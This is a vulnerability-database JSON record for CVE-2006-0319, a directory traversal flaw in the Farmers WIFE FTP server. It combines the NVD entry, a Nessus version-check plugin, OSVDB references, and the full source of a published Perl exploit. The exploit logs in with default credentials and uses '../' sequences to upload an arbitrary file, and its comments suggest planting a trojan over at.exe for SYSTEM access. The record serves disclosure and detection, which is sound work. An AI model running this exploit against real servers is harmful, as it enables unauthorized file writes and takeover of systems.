{"id": "CVE-2006-0319", "bulletinFamily": "NVD", "title": "CVE-2006-0319", "description": "Directory traversal vulnerability in the FTP server (port 22003/tcp) in Farmers WIFE 4.4 SP1 allows remote attackers to create arbitrary files via \"..\" (dot dot) sequences in a (1) PUT, (2) SIZE, and possibly other commands.", "published": "2006-01-19T01:03:00", "modified": "2017-07-20T01:29:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-0319", "reporter": "cve@mitre.org", "references": ["http://www.securityfocus.com/bid/16321", "http://www.lort.dk/DSR-farmerswife44sp1.pl", "http://www.osvdb.org/22496", "http://marc.info/?l=full-disclosure&m=113717162320654&w=2", "https://exchange.xforce.ibmcloud.com/vulnerabilities/24190", "http://secunia.com/advisories/18508"], "cvelist": ["CVE-2006-0319"], "type": "cve", "lastseen": "2019-05-29T18:08:30", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "a44f2310c80548f20a8cb27ba3f03710"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "2346cd01356c16e807bfbd53f01b740d"}, {"key": "cpe23", "hash": "b6b623b70ba38d2ad8fd890648859b17"}, {"key": "cvelist", "hash": "ede77cc2b5bafa9b9a69697cd113944f"}, {"key": "cvss", "hash": "b5bbdd851ff7634dd01c09e00d03be1e"}, {"key": "cvss2", "hash": "e2b44d17a049a159a684c7e2b843b3fa"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cwe", "hash": "78a7a5cbaf09985c14389298e454e7db"}, {"key": "description", "hash": "21df1e31139e413942e542d062745816"}, {"key": "href", "hash": "db87e0d0dc16a62d1fdbf0c736519eb7"}, {"key": "modified", "hash": "8beb21540db0e4c02532c0e597356857"}, {"key": "published", "hash": "8e16ad2050403fcbd2e8a31cf1a30de3"}, {"key": "references", "hash": "4b3467f4270d368bf9bca8b9129f970a"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "7174cec3dbb552e29103a99932e78074"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "776e10eaf89a7a621c563a46ea4f875c355767de75a82e5b61a3a41ee34db7ea", "viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "osvdb", "idList": ["OSVDB:22496"]}, {"type": "exploitdb", "idList": ["EDB-ID:1417"]}, {"type": "nessus", "idList": ["FARMERSWIFE_FTP_DIR_TRAVERSAL.NASL"]}], "modified": "2019-05-29T18:08:30"}, "score": {"value": 6.4, "vector": "NONE", "modified": "2019-05-29T18:08:30"}, "vulnersScore": 6.4}, "objectVersion": "1.3", "cpe": ["cpe:/a:farmers_wife:farmers_wife:4.4_sp1"], "affectedSoftware": [{"name": "farmers_wife farmers_wife", "operator": "eq", "version": "4.4_sp1"}], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "cpe23": ["cpe:2.3:a:farmers_wife:farmers_wife:4.4_sp1:*:*:*:*:*:*:*"], "cwe": ["NVD-CWE-Other"]}

{"nessus": [{"lastseen": "2020-01-01T07:06:10", "bulletinFamily": "scanner", "description": "The remote host appears to be running Farmers WIFE, a commercial\nfacilities, scheduling, and asset management package targeted at the\nmedia industry. \n\nThe version of Farmers WIFE installed on the remote host includes an\nFTP server that reportedly is vulnerable to directory traversal\nattacks. A user can leverage this issue to read and write to files\noutside the ftp root. Note that the application runs with SYSTEM\nprivileges under Windows.", "modified": "2020-01-02T00:00:00", "id": "FARMERSWIFE_FTP_DIR_TRAVERSAL.NASL", "href": "https://www.tenable.com/plugins/nessus/20754", "published": "2006-01-20T00:00:00", "title": "Farmers WIFE FTP Server Multiple Command Traversal Arbitrary File Creation", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description) {\n script_id(20754);\n script_version(\"1.21\");\n\n script_cve_id(\"CVE-2006-0319\");\n script_bugtraq_id(16321);\n\n script_name(english:\"Farmers WIFE FTP Server Multiple Command Traversal Arbitrary File Creation\");\n script_summary(english:\"Checks for directory traversal vulnerability in Farmers WIFE FTP server\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote ftp server is affected by a directory traversal flaw.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host appears to be running Farmers WIFE, a commercial\nfacilities, scheduling, and asset management package targeted at the\nmedia industry. \n\nThe version of Farmers WIFE installed on the remote host includes an\nFTP server that reportedly is vulnerable to directory traversal\nattacks. A user can leverage this issue to read and write to files\noutside the ftp root. Note that the application runs with SYSTEM\nprivileges under Windows.\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/fulldisclosure/2006/Jan/471\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Farmers WIFE 4.4 SP3 or later.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2006/01/20\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2006/01/06\");\n script_cvs_date(\"Date: 2018/11/15 20:50:22\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"remote\");\nscript_end_attributes();\n\n \n script_category(ACT_GATHER_INFO);\n script_family(english:\"FTP\");\n\n script_copyright(english:\"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"http_version.nasl\", \"ftpserver_detect_type_nd_version.nasl\");\n script_require_ports(\"Services/ftp\", 22003, \"Services/www\", 22002);\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"ftp_func.inc\");\n\n\nftp_port = get_ftp_port(default: 22003);\nhttp_port = get_http_port(default:22002);\n\n# Get the initial page.\nres = http_get_cache(item:\"/\", port:http_port, exit_on_fail: 1);\n\n# There's a problem if the version appears to be less than 4.4 SP3.\nif (\n \"<title>Farmers WIFE Web</title>\" >< res &&\n egrep(pattern:\">Server Version: ([0-3]\\..+|4\\.([0-3].*|4( \\(sp[0-2]\\)))?) &nbsp;\", string:res)\n) {\n security_warning(ftp_port);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "exploitdb": [{"lastseen": "2016-01-31T14:11:19", "bulletinFamily": "exploit", "description": "Farmers WIFE 4.4 sp1 (FTP) Remote System Access Exploit. CVE-2006-0319. Remote exploit for windows platform", "modified": "2006-01-14T00:00:00", "published": "2006-01-14T00:00:00", "id": "EDB-ID:1417", "href": "https://www.exploit-db.com/exploits/1417/", "type": "exploitdb", "title": "Farmers WIFE 4.4 sp1 FTP Remote System Access Exploit", "sourceData": "#!/usr/bin/perl\n# kokanin 20060106 // farmers wife server 4.4 sp1 allows us to \n# use ../../../ patterns as long as we stand in a folder where we have write access.\n# haha, that's what you get for implementing your own access control instead of relying on the underlying OS.\n# default port is 22003, default writable path is /guests.\n\n# 0day 0day, private, distribute and die bla bla bla\n# leet (translated) note from <anonymized>: you can log in as IEUser/mail@mail.com or anonymous/mail@mail.com\n# on _all_ farmers wife servers. This can't be disabled unless you turn off FTP access. The anonymous\n# login gives you guest access, which means write access to /guests, which means default remote 'root'\n# aka SYSTEM access. Ha ha ha, thanks anonymized, I missed that bit.\n\n\nif(!$ARGV[0]){ die \"Usage: ./thisscript.pl <ip> [user] [pass] [port] [path] [trojan.exe] [/path/to/target.exe] \\n\";}\n# as in: ./thisscript.pl 123.45.67.89 demo demo 22003 /writablepath /etc/hosts /owned.txt\n# by default we just put /etc/hosts in a file called owned.txt in the root of the drive - \n# nuke %SYSTEMROOT%\\system32\\at.exe and wait for windows to run it.\n\n# We can check for the %SYSTEMROOT% with the SIZE command to determine the proper\n# location for our trojan.\n\nuse Net::FTP;\nmy $target = $ARGV[0];\nmy $dotdot = \"../../../../../../../../../../../../../../\";\n# Here we set defaults (It's ugly, I know) that gives REMOTE REWT OMGOMG I MEAN SYSTEM\nif($ARGV[1]){ $user = $ARGV[1] } else { $user = \"IEUser\";}\nif($ARGV[2]){ $pass = $ARGV[2] } else { $pass = \"mail\\@mail.com\";}\nif($ARGV[3]){ $port = $ARGV[3] } else { $port = \"22003\";}\nif($ARGV[4]){ $writablepath = $ARGV[4] } else { $writablepath = \"/guests\";}\nif($ARGV[5]){ $trojan = $ARGV[5] } else { $trojan = \"/etc/hosts\";}\nif($ARGV[6]){ $destination = $ARGV[6] } else { $destination = \"owned.txt\";}\nprint \" target: $target \\n user: $user \\n pass: $pass \\n port: $port \\n writable path: $writablepath \\n trojan: $trojan \\n targetfile: $destination \\n\";\n\n# Open the command socket\nuse Net::FTP;\n$ftp = Net::FTP->new(\"$target\",\n Debug => 0,\n Port => \"$port\")\n\tor die \"Cannot connect: $@\";\n\t$ftp->login(\"$user\",\"$pass\")\n\tor die \"Cannot login \", $ftp->message;\n\t$ftp->cwd(\"$writablepath\")\n\t# this software is so shitty, it allows us to CWD to any folder and just pukes later if it's not there.\n\tor die \"Cannot go to writable dir \", $ftp->message;\n\t# leet %SYSTEMROOT% scan by determining where at.exe is using SIZE\n\tmy @systemroots = (\"PUNIX\",\"WINXP\",\"WINNT\",\"WIN2000\",\"WIN2K\",\"WINDOWS\",\"WINDOZE\");\n\tfor(@systemroots){\n\t\t$reply = $ftp->quot(\"SIZE \" . $dotdot . $_ . \"/system32/at.exe\");\n\t\tif($reply == 2) { print \" %SYSTEMROOT% is /$_\\n\";my $systemroot=$_; }\n\t\t}\n\t$ftp->binary;\n\t$ftp->put(\"$trojan\",\"$dotdot\".\"$destination\")\n\tand print \"file successfully uploaded, donate money to kokanin\\@gmail.com\\n\" or die \"Something messed up, file upload failed \", $ftp->message;\n$ftp->quit;\n\n# milw0rm.com [2006-01-14]\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/1417/"}], "osvdb": [{"lastseen": "2017-04-28T13:20:19", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\nVendor URL: http://www.electronicfarm.com/products/wifeinfo.asp\n[Secunia Advisory ID:18508](https://secuniaresearch.flexerasoftware.com/advisories/18508/)\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-01/0466.html\nGeneric Exploit URL: http://www.lort.dk/DSR-farmerswife44sp1.pl\n[CVE-2006-0319](https://vulners.com/cve/CVE-2006-0319)\nBugtraq ID: 16321\n", "modified": "2006-01-06T14:03:24", "published": "2006-01-06T14:03:24", "href": "https://vulners.com/osvdb/OSVDB:22496", "id": "OSVDB:22496", "type": "osvdb", "title": "Farmers WIFE FTP Traversal Arbitrary File Upload", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}]}